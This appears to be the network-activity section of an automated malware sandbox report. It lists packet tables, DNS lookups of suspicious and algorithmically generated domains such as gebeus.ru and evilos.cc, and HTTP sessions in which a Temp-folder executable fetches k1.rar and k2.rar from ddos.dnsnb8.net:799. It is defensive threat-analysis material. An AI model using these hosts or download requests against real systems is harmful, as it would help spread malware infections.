                                                                                    Jul 24, 2024 19:59:05.227616072 CEST49852443192.168.2.10167.235.128.153
                                                                                    Jul 24, 2024 19:59:05.227619886 CEST44349852167.235.128.153192.168.2.10
                                                                                    Jul 24, 2024 19:59:05.227664948 CEST49852443192.168.2.10167.235.128.153
                                                                                    Jul 24, 2024 19:59:05.227668047 CEST44349852167.235.128.153192.168.2.10
                                                                                    Jul 24, 2024 19:59:05.227790117 CEST44349852167.235.128.153192.168.2.10
                                                                                    Jul 24, 2024 19:59:05.227911949 CEST49852443192.168.2.10167.235.128.153
                                                                                    Jul 24, 2024 19:59:05.268498898 CEST44349852167.235.128.153192.168.2.10
                                                                                    Jul 24, 2024 19:59:06.149869919 CEST44349852167.235.128.153192.168.2.10
                                                                                    Jul 24, 2024 19:59:06.149964094 CEST44349852167.235.128.153192.168.2.10
                                                                                    Jul 24, 2024 19:59:06.150182009 CEST49852443192.168.2.10167.235.128.153
                                                                                    Jul 24, 2024 19:59:06.166721106 CEST49852443192.168.2.10167.235.128.153
                                                                                    Jul 24, 2024 19:59:06.166752100 CEST44349852167.235.128.153192.168.2.10
                                                                                    Jul 24, 2024 19:59:06.166770935 CEST49852443192.168.2.10167.235.128.153
                                                                                    Jul 24, 2024 19:59:06.166778088 CEST44349852167.235.128.153192.168.2.10
                                                                                    Jul 24, 2024 19:59:06.282660007 CEST49853443192.168.2.10107.173.160.137
                                                                                    Jul 24, 2024 19:59:06.282753944 CEST44349853107.173.160.137192.168.2.10
                                                                                    Jul 24, 2024 19:59:06.282860041 CEST49853443192.168.2.10107.173.160.137
                                                                                    Jul 24, 2024 19:59:06.283288956 CEST49853443192.168.2.10107.173.160.137
                                                                                    Jul 24, 2024 19:59:06.283328056 CEST44349853107.173.160.137192.168.2.10
                                                                                    Jul 24, 2024 19:59:07.562704086 CEST44349853107.173.160.137192.168.2.10
                                                                                    Jul 24, 2024 19:59:07.562807083 CEST49853443192.168.2.10107.173.160.137
                                                                                    Jul 24, 2024 19:59:07.593370914 CEST49853443192.168.2.10107.173.160.137
                                                                                    Jul 24, 2024 19:59:07.593401909 CEST44349853107.173.160.137192.168.2.10
                                                                                    Jul 24, 2024 19:59:07.593452930 CEST49853443192.168.2.10107.173.160.137
                                                                                    Jul 24, 2024 19:59:07.593457937 CEST44349853107.173.160.137192.168.2.10
                                                                                    Jul 24, 2024 19:59:07.593492985 CEST49853443192.168.2.10107.173.160.137
                                                                                    Jul 24, 2024 19:59:07.593497992 CEST44349853107.173.160.137192.168.2.10
                                                                                    Jul 24, 2024 19:59:07.594281912 CEST44349853107.173.160.137192.168.2.10
                                                                                    Jul 24, 2024 19:59:07.594486952 CEST49853443192.168.2.10107.173.160.137
                                                                                    Jul 24, 2024 19:59:07.640505075 CEST44349853107.173.160.137192.168.2.10
                                                                                    Jul 24, 2024 19:59:08.933173895 CEST44349853107.173.160.137192.168.2.10
                                                                                    Jul 24, 2024 19:59:08.933269024 CEST44349853107.173.160.137192.168.2.10
                                                                                    Jul 24, 2024 19:59:08.933399916 CEST49853443192.168.2.10107.173.160.137
                                                                                    Jul 24, 2024 19:59:08.949589014 CEST49853443192.168.2.10107.173.160.137
                                                                                    Jul 24, 2024 19:59:08.949636936 CEST44349853107.173.160.137192.168.2.10
                                                                                    Jul 24, 2024 19:59:08.949745893 CEST49853443192.168.2.10107.173.160.137
                                                                                    Jul 24, 2024 19:59:08.949755907 CEST44349853107.173.160.137192.168.2.10
                                                                                    Jul 24, 2024 19:59:09.066941977 CEST49854443192.168.2.10107.173.160.139
                                                                                    Jul 24, 2024 19:59:09.067007065 CEST44349854107.173.160.139192.168.2.10
                                                                                    Jul 24, 2024 19:59:09.067075968 CEST49854443192.168.2.10107.173.160.139
                                                                                    Jul 24, 2024 19:59:09.067482948 CEST49854443192.168.2.10107.173.160.139
                                                                                    Jul 24, 2024 19:59:09.067495108 CEST44349854107.173.160.139192.168.2.10
                                                                                    Jul 24, 2024 19:59:09.709146976 CEST44349854107.173.160.139192.168.2.10
                                                                                    Jul 24, 2024 19:59:09.709264040 CEST49854443192.168.2.10107.173.160.139
                                                                                    Jul 24, 2024 19:59:09.712718964 CEST49854443192.168.2.10107.173.160.139
                                                                                    Jul 24, 2024 19:59:09.712729931 CEST44349854107.173.160.139192.168.2.10
                                                                                    Jul 24, 2024 19:59:09.712810993 CEST49854443192.168.2.10107.173.160.139
                                                                                    Jul 24, 2024 19:59:09.712816000 CEST44349854107.173.160.139192.168.2.10
                                                                                    Jul 24, 2024 19:59:09.712851048 CEST49854443192.168.2.10107.173.160.139
                                                                                    Jul 24, 2024 19:59:09.712855101 CEST44349854107.173.160.139192.168.2.10
                                                                                    Jul 24, 2024 19:59:09.712979078 CEST44349854107.173.160.139192.168.2.10
                                                                                    Jul 24, 2024 19:59:09.713089943 CEST49854443192.168.2.10107.173.160.139
                                                                                    Jul 24, 2024 19:59:09.760507107 CEST44349854107.173.160.139192.168.2.10
                                                                                    Jul 24, 2024 19:59:10.947396994 CEST44349854107.173.160.139192.168.2.10
                                                                                    Jul 24, 2024 19:59:10.947489023 CEST44349854107.173.160.139192.168.2.10
                                                                                    Jul 24, 2024 19:59:10.947607040 CEST49854443192.168.2.10107.173.160.139
                                                                                    Jul 24, 2024 19:59:10.980963945 CEST49854443192.168.2.10107.173.160.139
                                                                                    Jul 24, 2024 19:59:10.981013060 CEST44349854107.173.160.139192.168.2.10
                                                                                    Jul 24, 2024 19:59:10.981034994 CEST49854443192.168.2.10107.173.160.139
                                                                                    Jul 24, 2024 19:59:10.981041908 CEST44349854107.173.160.139192.168.2.10
                                                                                    Jul 24, 2024 19:59:12.577533007 CEST498214449192.168.2.1094.156.79.190
                                                                                    Jul 24, 2024 19:59:12.583456039 CEST44494982194.156.79.190192.168.2.10
                                                                                    Jul 24, 2024 19:59:12.583523989 CEST498214449192.168.2.1094.156.79.190
                                                                                    Jul 24, 2024 19:59:12.590893984 CEST44494982194.156.79.190192.168.2.10
                                                                                    Jul 24, 2024 19:59:12.941451073 CEST44494982194.156.79.190192.168.2.10
                                                                                    Jul 24, 2024 19:59:12.985094070 CEST498214449192.168.2.1094.156.79.190
                                                                                    Jul 24, 2024 19:59:13.093833923 CEST44494982194.156.79.190192.168.2.10
                                                                                    Jul 24, 2024 19:59:13.095089912 CEST498214449192.168.2.1094.156.79.190
                                                                                    Jul 24, 2024 19:59:13.099958897 CEST44494982194.156.79.190192.168.2.10
                                                                                    Jul 24, 2024 19:59:13.100207090 CEST498214449192.168.2.1094.156.79.190
                                                                                    Jul 24, 2024 19:59:13.105195045 CEST44494982194.156.79.190192.168.2.10
                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                    Jul 24, 2024 19:55:04.239382029 CEST5134953192.168.2.101.1.1.1
                                                                                    Jul 24, 2024 19:55:05.253161907 CEST5134953192.168.2.101.1.1.1
                                                                                    Jul 24, 2024 19:55:06.316844940 CEST5134953192.168.2.101.1.1.1
                                                                                    Jul 24, 2024 19:55:07.850765944 CEST53513491.1.1.1192.168.2.10
                                                                                    Jul 24, 2024 19:55:07.850812912 CEST53513491.1.1.1192.168.2.10
                                                                                    Jul 24, 2024 19:55:07.850853920 CEST53513491.1.1.1192.168.2.10
                                                                                    Jul 24, 2024 19:55:38.598268032 CEST6351153192.168.2.101.1.1.1
                                                                                    Jul 24, 2024 19:55:39.606379986 CEST6351153192.168.2.101.1.1.1
                                                                                    Jul 24, 2024 19:55:40.622288942 CEST6351153192.168.2.101.1.1.1
                                                                                    Jul 24, 2024 19:55:41.434992075 CEST53635111.1.1.1192.168.2.10
                                                                                    Jul 24, 2024 19:55:41.435039997 CEST53635111.1.1.1192.168.2.10
                                                                                    Jul 24, 2024 19:55:41.435409069 CEST53635111.1.1.1192.168.2.10
                                                                                    Jul 24, 2024 19:55:43.499428988 CEST5620853192.168.2.101.1.1.1
                                                                                    Jul 24, 2024 19:55:44.512749910 CEST5620853192.168.2.101.1.1.1
                                                                                    Jul 24, 2024 19:55:45.512440920 CEST5620853192.168.2.101.1.1.1
                                                                                    Jul 24, 2024 19:55:45.885318995 CEST53562081.1.1.1192.168.2.10
                                                                                    Jul 24, 2024 19:55:45.885332108 CEST53562081.1.1.1192.168.2.10
                                                                                    Jul 24, 2024 19:55:45.885881901 CEST53562081.1.1.1192.168.2.10
                                                                                    Jul 24, 2024 19:56:29.008738041 CEST5237553192.168.2.101.1.1.1
                                                                                    Jul 24, 2024 19:56:29.066689968 CEST53523751.1.1.1192.168.2.10
                                                                                    Jul 24, 2024 19:56:43.066237926 CEST6185053192.168.2.101.1.1.1
                                                                                    Jul 24, 2024 19:56:43.125749111 CEST53618501.1.1.1192.168.2.10
                                                                                    Jul 24, 2024 19:56:50.332357883 CEST6446553192.168.2.101.1.1.1
                                                                                    Jul 24, 2024 19:56:50.349332094 CEST53644651.1.1.1192.168.2.10
                                                                                    Jul 24, 2024 19:56:52.783027887 CEST5389453192.168.2.101.1.1.1
                                                                                    Jul 24, 2024 19:56:52.790988922 CEST53538941.1.1.1192.168.2.10
                                                                                    Jul 24, 2024 19:56:56.004627943 CEST5651353192.168.2.101.1.1.1
                                                                                    Jul 24, 2024 19:56:56.106863976 CEST53565131.1.1.1192.168.2.10
                                                                                    Jul 24, 2024 19:57:17.023515940 CEST5189353192.168.2.101.1.1.1
                                                                                    Jul 24, 2024 19:57:17.039048910 CEST53518931.1.1.1192.168.2.10
                                                                                    Jul 24, 2024 19:58:26.605739117 CEST6200153192.168.2.101.1.1.1
                                                                                    Jul 24, 2024 19:58:27.594754934 CEST6200153192.168.2.101.1.1.1
                                                                                    Jul 24, 2024 19:58:28.610470057 CEST6200153192.168.2.101.1.1.1
                                                                                    Jul 24, 2024 19:58:30.085942984 CEST53620011.1.1.1192.168.2.10
                                                                                    Jul 24, 2024 19:58:30.085961103 CEST53620011.1.1.1192.168.2.10
                                                                                    Jul 24, 2024 19:58:30.085971117 CEST53620011.1.1.1192.168.2.10
                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                    Jul 24, 2024 19:55:04.239382029 CEST192.168.2.101.1.1.10x5759Standard query (0)ddos.dnsnb8.netA (IP address)IN (0x0001)false
                                                                                    Jul 24, 2024 19:55:05.253161907 CEST192.168.2.101.1.1.10x5759Standard query (0)ddos.dnsnb8.netA (IP address)IN (0x0001)false
                                                                                    Jul 24, 2024 19:55:06.316844940 CEST192.168.2.101.1.1.10x5759Standard query (0)ddos.dnsnb8.netA (IP address)IN (0x0001)false
                                                                                    Jul 24, 2024 19:55:38.598268032 CEST192.168.2.101.1.1.10x9aStandard query (0)evilos.ccA (IP address)IN (0x0001)false
                                                                                    Jul 24, 2024 19:55:39.606379986 CEST192.168.2.101.1.1.10x9aStandard query (0)evilos.ccA (IP address)IN (0x0001)false
                                                                                    Jul 24, 2024 19:55:40.622288942 CEST192.168.2.101.1.1.10x9aStandard query (0)evilos.ccA (IP address)IN (0x0001)false
                                                                                    Jul 24, 2024 19:55:43.499428988 CEST192.168.2.101.1.1.10x45d5Standard query (0)gebeus.ruA (IP address)IN (0x0001)false
                                                                                    Jul 24, 2024 19:55:44.512749910 CEST192.168.2.101.1.1.10x45d5Standard query (0)gebeus.ruA (IP address)IN (0x0001)false
                                                                                    Jul 24, 2024 19:55:45.512440920 CEST192.168.2.101.1.1.10x45d5Standard query (0)gebeus.ruA (IP address)IN (0x0001)false
                                                                                    Jul 24, 2024 19:56:29.008738041 CEST192.168.2.101.1.1.10x26c7Standard query (0)mussangroup.comA (IP address)IN (0x0001)false
                                                                                    Jul 24, 2024 19:56:43.066237926 CEST192.168.2.101.1.1.10x13e0Standard query (0)funrecipebooks.comA (IP address)IN (0x0001)false
                                                                                    Jul 24, 2024 19:56:50.332357883 CEST192.168.2.101.1.1.10x163aStandard query (0)callosallsaospz.shopA (IP address)IN (0x0001)false
                                                                                    Jul 24, 2024 19:56:52.783027887 CEST192.168.2.101.1.1.10x5f80Standard query (0)rentry.coA (IP address)IN (0x0001)false
                                                                                    Jul 24, 2024 19:56:56.004627943 CEST192.168.2.101.1.1.10xd5Standard query (0)store4.gofile.ioA (IP address)IN (0x0001)false
                                                                                    Jul 24, 2024 19:57:17.023515940 CEST192.168.2.101.1.1.10xf849Standard query (0)liernessfornicsa.shopA (IP address)IN (0x0001)false
                                                                                    Jul 24, 2024 19:58:26.605739117 CEST192.168.2.101.1.1.10xd22bStandard query (0)gebeus.ruA (IP address)IN (0x0001)false
                                                                                    Jul 24, 2024 19:58:27.594754934 CEST192.168.2.101.1.1.10xd22bStandard query (0)gebeus.ruA (IP address)IN (0x0001)false
                                                                                    Jul 24, 2024 19:58:28.610470057 CEST192.168.2.101.1.1.10xd22bStandard query (0)gebeus.ruA (IP address)IN (0x0001)false
                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                    Jul 24, 2024 19:55:07.850765944 CEST1.1.1.1192.168.2.100x5759No error (0)ddos.dnsnb8.net44.221.84.105A (IP address)IN (0x0001)false
                                                                                    Jul 24, 2024 19:55:07.850812912 CEST1.1.1.1192.168.2.100x5759No error (0)ddos.dnsnb8.net44.221.84.105A (IP address)IN (0x0001)false
                                                                                    Jul 24, 2024 19:55:07.850853920 CEST1.1.1.1192.168.2.100x5759No error (0)ddos.dnsnb8.net44.221.84.105A (IP address)IN (0x0001)false
                                                                                    Jul 24, 2024 19:55:19.522352934 CEST1.1.1.1192.168.2.100x25e2No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                    Jul 24, 2024 19:55:19.522352934 CEST1.1.1.1192.168.2.100x25e2No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                    Jul 24, 2024 19:55:41.434992075 CEST1.1.1.1192.168.2.100x9aNo error (0)evilos.cc127.0.0.127A (IP address)IN (0x0001)false
                                                                                    Jul 24, 2024 19:55:41.435039997 CEST1.1.1.1192.168.2.100x9aNo error (0)evilos.cc127.0.0.127A (IP address)IN (0x0001)false
                                                                                    Jul 24, 2024 19:55:41.435409069 CEST1.1.1.1192.168.2.100x9aNo error (0)evilos.cc127.0.0.127A (IP address)IN (0x0001)false
                                                                                    Jul 24, 2024 19:55:45.885318995 CEST1.1.1.1192.168.2.100x45d5No error (0)gebeus.ru189.165.133.52A (IP address)IN (0x0001)false
                                                                                    Jul 24, 2024 19:55:45.885318995 CEST1.1.1.1192.168.2.100x45d5No error (0)gebeus.ru187.131.250.134A (IP address)IN (0x0001)false
                                                                                    Jul 24, 2024 19:55:45.885318995 CEST1.1.1.1192.168.2.100x45d5No error (0)gebeus.ru211.168.53.110A (IP address)IN (0x0001)false
                                                                                    Jul 24, 2024 19:55:45.885318995 CEST1.1.1.1192.168.2.100x45d5No error (0)gebeus.ru189.181.26.154A (IP address)IN (0x0001)false
                                                                                    Jul 24, 2024 19:55:45.885318995 CEST1.1.1.1192.168.2.100x45d5No error (0)gebeus.ru92.36.226.66A (IP address)IN (0x0001)false
                                                                                    Jul 24, 2024 19:55:45.885318995 CEST1.1.1.1192.168.2.100x45d5No error (0)gebeus.ru187.199.234.114A (IP address)IN (0x0001)false
                                                                                    Jul 24, 2024 19:55:45.885318995 CEST1.1.1.1192.168.2.100x45d5No error (0)gebeus.ru95.86.30.3A (IP address)IN (0x0001)false
                                                                                    Jul 24, 2024 19:55:45.885318995 CEST1.1.1.1192.168.2.100x45d5No error (0)gebeus.ru46.100.50.5A (IP address)IN (0x0001)false
                                                                                    Jul 24, 2024 19:55:45.885318995 CEST1.1.1.1192.168.2.100x45d5No error (0)gebeus.ru186.101.193.110A (IP address)IN (0x0001)false
                                                                                    Jul 24, 2024 19:55:45.885318995 CEST1.1.1.1192.168.2.100x45d5No error (0)gebeus.ru187.204.65.18A (IP address)IN (0x0001)false
                                                                                    Jul 24, 2024 19:55:45.885332108 CEST1.1.1.1192.168.2.100x45d5No error (0)gebeus.ru189.165.133.52A (IP address)IN (0x0001)false
                                                                                    Jul 24, 2024 19:55:45.885332108 CEST1.1.1.1192.168.2.100x45d5No error (0)gebeus.ru187.131.250.134A (IP address)IN (0x0001)false
                                                                                    Jul 24, 2024 19:55:45.885332108 CEST1.1.1.1192.168.2.100x45d5No error (0)gebeus.ru211.168.53.110A (IP address)IN (0x0001)false
                                                                                    Jul 24, 2024 19:55:45.885332108 CEST1.1.1.1192.168.2.100x45d5No error (0)gebeus.ru189.181.26.154A (IP address)IN (0x0001)false
                                                                                    Jul 24, 2024 19:55:45.885332108 CEST1.1.1.1192.168.2.100x45d5No error (0)gebeus.ru92.36.226.66A (IP address)IN (0x0001)false
                                                                                    Jul 24, 2024 19:55:45.885332108 CEST1.1.1.1192.168.2.100x45d5No error (0)gebeus.ru187.199.234.114A (IP address)IN (0x0001)false
                                                                                    Jul 24, 2024 19:55:45.885332108 CEST1.1.1.1192.168.2.100x45d5No error (0)gebeus.ru95.86.30.3A (IP address)IN (0x0001)false
                                                                                    Jul 24, 2024 19:55:45.885332108 CEST1.1.1.1192.168.2.100x45d5No error (0)gebeus.ru46.100.50.5A (IP address)IN (0x0001)false
                                                                                    Jul 24, 2024 19:55:45.885332108 CEST1.1.1.1192.168.2.100x45d5No error (0)gebeus.ru186.101.193.110A (IP address)IN (0x0001)false
                                                                                    Jul 24, 2024 19:55:45.885332108 CEST1.1.1.1192.168.2.100x45d5No error (0)gebeus.ru187.204.65.18A (IP address)IN (0x0001)false
                                                                                    Jul 24, 2024 19:55:45.885881901 CEST1.1.1.1192.168.2.100x45d5No error (0)gebeus.ru189.165.133.52A (IP address)IN (0x0001)false
                                                                                    Jul 24, 2024 19:55:45.885881901 CEST1.1.1.1192.168.2.100x45d5No error (0)gebeus.ru187.131.250.134A (IP address)IN (0x0001)false
                                                                                    Jul 24, 2024 19:55:45.885881901 CEST1.1.1.1192.168.2.100x45d5No error (0)gebeus.ru211.168.53.110A (IP address)IN (0x0001)false
                                                                                    Jul 24, 2024 19:55:45.885881901 CEST1.1.1.1192.168.2.100x45d5No error (0)gebeus.ru189.181.26.154A (IP address)IN (0x0001)false
                                                                                    Jul 24, 2024 19:55:45.885881901 CEST1.1.1.1192.168.2.100x45d5No error (0)gebeus.ru92.36.226.66A (IP address)IN (0x0001)false
                                                                                    Jul 24, 2024 19:55:45.885881901 CEST1.1.1.1192.168.2.100x45d5No error (0)gebeus.ru187.199.234.114A (IP address)IN (0x0001)false
                                                                                    Jul 24, 2024 19:55:45.885881901 CEST1.1.1.1192.168.2.100x45d5No error (0)gebeus.ru95.86.30.3A (IP address)IN (0x0001)false
                                                                                    Jul 24, 2024 19:55:45.885881901 CEST1.1.1.1192.168.2.100x45d5No error (0)gebeus.ru46.100.50.5A (IP address)IN (0x0001)false
                                                                                    Jul 24, 2024 19:55:45.885881901 CEST1.1.1.1192.168.2.100x45d5No error (0)gebeus.ru186.101.193.110A (IP address)IN (0x0001)false
                                                                                    Jul 24, 2024 19:55:45.885881901 CEST1.1.1.1192.168.2.100x45d5No error (0)gebeus.ru187.204.65.18A (IP address)IN (0x0001)false
                                                                                    Jul 24, 2024 19:56:29.066689968 CEST1.1.1.1192.168.2.100x26c7No error (0)mussangroup.com185.149.100.242A (IP address)IN (0x0001)false
                                                                                    Jul 24, 2024 19:56:43.125749111 CEST1.1.1.1192.168.2.100x13e0No error (0)funrecipebooks.com162.0.235.84A (IP address)IN (0x0001)false
                                                                                    Jul 24, 2024 19:56:50.349332094 CEST1.1.1.1192.168.2.100x163aNo error (0)callosallsaospz.shop188.114.96.3A (IP address)IN (0x0001)false
                                                                                    Jul 24, 2024 19:56:50.349332094 CEST1.1.1.1192.168.2.100x163aNo error (0)callosallsaospz.shop188.114.97.3A (IP address)IN (0x0001)false
                                                                                    Jul 24, 2024 19:56:52.790988922 CEST1.1.1.1192.168.2.100x5f80No error (0)rentry.co104.26.3.16A (IP address)IN (0x0001)false
                                                                                    Jul 24, 2024 19:56:52.790988922 CEST1.1.1.1192.168.2.100x5f80No error (0)rentry.co104.26.2.16A (IP address)IN (0x0001)false
                                                                                    Jul 24, 2024 19:56:52.790988922 CEST1.1.1.1192.168.2.100x5f80No error (0)rentry.co172.67.75.40A (IP address)IN (0x0001)false
                                                                                    Jul 24, 2024 19:56:56.106863976 CEST1.1.1.1192.168.2.100xd5No error (0)store4.gofile.io31.14.70.245A (IP address)IN (0x0001)false
                                                                                    Jul 24, 2024 19:57:17.039048910 CEST1.1.1.1192.168.2.100xf849No error (0)liernessfornicsa.shop172.67.213.85A (IP address)IN (0x0001)false
                                                                                    Jul 24, 2024 19:57:17.039048910 CEST1.1.1.1192.168.2.100xf849No error (0)liernessfornicsa.shop104.21.77.246A (IP address)IN (0x0001)false
                                                                                    Jul 24, 2024 19:58:11.040081978 CEST1.1.1.1192.168.2.100xebb9No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                    Jul 24, 2024 19:58:11.040081978 CEST1.1.1.1192.168.2.100xebb9No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                    Jul 24, 2024 19:58:30.085942984 CEST1.1.1.1192.168.2.100xd22bNo error (0)gebeus.ru211.168.53.110A (IP address)IN (0x0001)false
                                                                                    Jul 24, 2024 19:58:30.085942984 CEST1.1.1.1192.168.2.100xd22bNo error (0)gebeus.ru189.181.26.154A (IP address)IN (0x0001)false
                                                                                    Jul 24, 2024 19:58:30.085942984 CEST1.1.1.1192.168.2.100xd22bNo error (0)gebeus.ru92.36.226.66A (IP address)IN (0x0001)false
                                                                                    Jul 24, 2024 19:58:30.085942984 CEST1.1.1.1192.168.2.100xd22bNo error (0)gebeus.ru187.199.234.114A (IP address)IN (0x0001)false
                                                                                    Jul 24, 2024 19:58:30.085942984 CEST1.1.1.1192.168.2.100xd22bNo error (0)gebeus.ru95.86.30.3A (IP address)IN (0x0001)false
                                                                                    Jul 24, 2024 19:58:30.085942984 CEST1.1.1.1192.168.2.100xd22bNo error (0)gebeus.ru46.100.50.5A (IP address)IN (0x0001)false
                                                                                    Jul 24, 2024 19:58:30.085942984 CEST1.1.1.1192.168.2.100xd22bNo error (0)gebeus.ru186.101.193.110A (IP address)IN (0x0001)false
                                                                                    Jul 24, 2024 19:58:30.085942984 CEST1.1.1.1192.168.2.100xd22bNo error (0)gebeus.ru187.204.65.18A (IP address)IN (0x0001)false
                                                                                    Jul 24, 2024 19:58:30.085942984 CEST1.1.1.1192.168.2.100xd22bNo error (0)gebeus.ru189.165.133.52A (IP address)IN (0x0001)false
                                                                                    Jul 24, 2024 19:58:30.085942984 CEST1.1.1.1192.168.2.100xd22bNo error (0)gebeus.ru187.131.250.134A (IP address)IN (0x0001)false
                                                                                    Jul 24, 2024 19:58:30.085961103 CEST1.1.1.1192.168.2.100xd22bNo error (0)gebeus.ru211.168.53.110A (IP address)IN (0x0001)false
                                                                                    Jul 24, 2024 19:58:30.085961103 CEST1.1.1.1192.168.2.100xd22bNo error (0)gebeus.ru189.181.26.154A (IP address)IN (0x0001)false
                                                                                    Jul 24, 2024 19:58:30.085961103 CEST1.1.1.1192.168.2.100xd22bNo error (0)gebeus.ru92.36.226.66A (IP address)IN (0x0001)false
                                                                                    Jul 24, 2024 19:58:30.085961103 CEST1.1.1.1192.168.2.100xd22bNo error (0)gebeus.ru187.199.234.114A (IP address)IN (0x0001)false
                                                                                    Jul 24, 2024 19:58:30.085961103 CEST1.1.1.1192.168.2.100xd22bNo error (0)gebeus.ru95.86.30.3A (IP address)IN (0x0001)false
                                                                                    Jul 24, 2024 19:58:30.085961103 CEST1.1.1.1192.168.2.100xd22bNo error (0)gebeus.ru46.100.50.5A (IP address)IN (0x0001)false
                                                                                    Jul 24, 2024 19:58:30.085961103 CEST1.1.1.1192.168.2.100xd22bNo error (0)gebeus.ru186.101.193.110A (IP address)IN (0x0001)false
                                                                                    Jul 24, 2024 19:58:30.085961103 CEST1.1.1.1192.168.2.100xd22bNo error (0)gebeus.ru187.204.65.18A (IP address)IN (0x0001)false
                                                                                    Jul 24, 2024 19:58:30.085961103 CEST1.1.1.1192.168.2.100xd22bNo error (0)gebeus.ru189.165.133.52A (IP address)IN (0x0001)false
                                                                                    Jul 24, 2024 19:58:30.085961103 CEST1.1.1.1192.168.2.100xd22bNo error (0)gebeus.ru187.131.250.134A (IP address)IN (0x0001)false
                                                                                    Jul 24, 2024 19:58:30.085971117 CEST1.1.1.1192.168.2.100xd22bNo error (0)gebeus.ru211.168.53.110A (IP address)IN (0x0001)false
                                                                                    Jul 24, 2024 19:58:30.085971117 CEST1.1.1.1192.168.2.100xd22bNo error (0)gebeus.ru189.181.26.154A (IP address)IN (0x0001)false
                                                                                    Jul 24, 2024 19:58:30.085971117 CEST1.1.1.1192.168.2.100xd22bNo error (0)gebeus.ru92.36.226.66A (IP address)IN (0x0001)false
                                                                                    Jul 24, 2024 19:58:30.085971117 CEST1.1.1.1192.168.2.100xd22bNo error (0)gebeus.ru187.199.234.114A (IP address)IN (0x0001)false
                                                                                    Jul 24, 2024 19:58:30.085971117 CEST1.1.1.1192.168.2.100xd22bNo error (0)gebeus.ru95.86.30.3A (IP address)IN (0x0001)false
                                                                                    Jul 24, 2024 19:58:30.085971117 CEST1.1.1.1192.168.2.100xd22bNo error (0)gebeus.ru46.100.50.5A (IP address)IN (0x0001)false
                                                                                    Jul 24, 2024 19:58:30.085971117 CEST1.1.1.1192.168.2.100xd22bNo error (0)gebeus.ru186.101.193.110A (IP address)IN (0x0001)false
                                                                                    Jul 24, 2024 19:58:30.085971117 CEST1.1.1.1192.168.2.100xd22bNo error (0)gebeus.ru187.204.65.18A (IP address)IN (0x0001)false
                                                                                    Jul 24, 2024 19:58:30.085971117 CEST1.1.1.1192.168.2.100xd22bNo error (0)gebeus.ru189.165.133.52A (IP address)IN (0x0001)false
                                                                                    Jul 24, 2024 19:58:30.085971117 CEST1.1.1.1192.168.2.100xd22bNo error (0)gebeus.ru187.131.250.134A (IP address)IN (0x0001)false
                                                                                    • mussangroup.com
                                                                                    • 167.235.128.153
                                                                                    • 107.173.160.137
                                                                                    • 107.173.160.139
                                                                                    • funrecipebooks.com
                                                                                    • callosallsaospz.shop
                                                                                    • rentry.co
                                                                                    • store4.gofile.io
                                                                                    • liernessfornicsa.shop
                                                                                    • ddos.dnsnb8.net:799
                                                                                    • mbcyqmttpiinpghx.com
                                                                                      • gebeus.ru
                                                                                    • eyqxnblygic.org
                                                                                    • elpsnjvbyqt.com
                                                                                    • xnmfeyqpwnehurxh.net
                                                                                    • eeycidiyfjvuwaep.net
                                                                                    • qmbakktwarjac.net
                                                                                    • feltxgyoedldtlt.net
                                                                                    • wtlgosscvcry.org
                                                                                    • 77.221.157.163
                                                                                    • pkqgdawiidcayk.com
                                                                                    • mmcxxioyukngeefd.org
                                                                                    • coiniqplnikp.com
                                                                                    • sijoltnxjfxqjw.org
                                                                                    • uwqwnifeydwej.com
                                                                                    • jpenaelwjof.org
                                                                                    • 64.190.113.113
                                                                                    • tfqtvoxxlfyfid.org
                                                                                    • mhvibsdewxn.org
                                                                                    • akvufandfxiqflw.net
                                                                                    • bqhvneiiyelqwiyv.net
                                                                                    • oqgvummtqov.com
                                                                                    • vxvnjhhjwdcwv.com
                                                                                    • wagishcpburncp.com
                                                                                    • rhafqfudulgf.org
                                                                                    • bmucdlsvjvamj.org
                                                                                    • ebgowpcalmic.org
                                                                                    • kguhhqwlowh.com
                                                                                    • ajhanernmeqt.com
                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    0192.168.2.104970344.221.84.1057997516C:\Users\user\AppData\Local\Temp\IXDaI.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jul 24, 2024 19:55:07.938378096 CEST288OUTGET /cj//k1.rar HTTP/1.1
                                                                                    Accept: */*
                                                                                    Accept-Encoding: gzip, deflate
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                    Host: ddos.dnsnb8.net:799
                                                                                    Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1192.168.2.104971144.221.84.1057997708C:\Users\user\AppData\Local\Temp\IXDaI.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jul 24, 2024 19:55:39.957458019 CEST288OUTGET /cj//k1.rar HTTP/1.1
                                                                                    Accept: */*
                                                                                    Accept-Encoding: gzip, deflate
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                    Host: ddos.dnsnb8.net:799
                                                                                    Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2192.168.2.104971244.221.84.1057997708C:\Users\user\AppData\Local\Temp\IXDaI.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jul 24, 2024 19:55:40.415846109 CEST288OUTGET /cj//k2.rar HTTP/1.1
                                                                                    Accept: */*
                                                                                    Accept-Encoding: gzip, deflate
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                    Host: ddos.dnsnb8.net:799
                                                                                    Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
